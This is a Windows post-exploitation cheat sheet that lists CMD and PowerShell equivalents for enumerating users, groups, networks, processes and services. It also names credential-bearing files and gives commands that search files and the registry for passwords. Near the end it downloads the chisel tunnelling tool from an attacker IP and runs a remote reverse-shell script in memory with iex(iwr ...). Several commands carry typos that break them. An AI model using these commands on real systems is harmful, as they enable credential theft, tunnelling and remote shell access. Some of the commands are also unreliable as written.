Commands

  • To understand Powershell working and commands formation do checkout

Powershell
  • Commands used in post exploitation for CMD and Powershell variants

C: command for cmd
P: command for powershell
  • System information

C: systeminfo
P: Get-ComputerInfo
  • Grep

C: findstr
P: Select-String -Pattern "OS:"
  • Piping

|
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"
  • User name

C: whoami [or] echo %username%
P: $env:UserName  
  • Machine name

C: hostname
P: $env:DomainName [or] $env:Computername
  • Users

C: net user [or] net user /domain
P: Get-LocalUser
  • Information about the user

C: net user dnoscp
P: Get-LocalUser dnoscp
  • Groups

C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup
  • Get Group members

C: net localgroup Administrators
P: Get-LocalGroupMember Administrators
  • Get the network adapters

C: ipconfig [or] ipconfig /all
P: Get-NetAdapter
  • Routing Table information

C: route print
P: Get-NetRoute
  • Open ports

C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection
  • Scheduled Jobs

C: schtasks
P: Get-ScheduledTask
  • Running Process

C: tasklist /svc
P: Get-Process
  • Starting a service

C: net start Themes
P: Start-Process -FilePath "sort.exe"            
  • Installed Drivers

C: drivequery
P: Get-WindowsDriver -Online -All
  • Last upated information

C: wmic   qfe get Caption, Description, InstalledOn, HotFixID  
P: (New-Object -com "Microsoft.Update.AutoUpdate"). Results | fl
  • Juicy files location

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • Find files

C: dir /s /p /*.txt /*.xml
P: Get-ChildIten -Path . -Include *.txt,*xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'
  • Search for a string in a file

C: findstr /si "password" *.txt,*.xml
P: Get-ChildItem -Recurse . -Filter *.txt,*.xml | Select-String "password"
  • Serch registry for passwords

reg query HKLM /f "password" /t REG_SZ /s  
reg query HKCU /f "password" /t REG_SZ /s
  • Running Services

C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}
  • Information about the running processes

C: sc query "Spooler"
P: Get-Service "Spooler"
  • Copy a file

C: copy source_location destination
P: Copy-Item source_location -Destination destination
  • Move a file

C: move source_location destination
P: Move-Item source_location -Destination destination
  • Download a file

C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe")
  • Exeucte powershell scripts directly from the memory

P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)

# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)

Last updated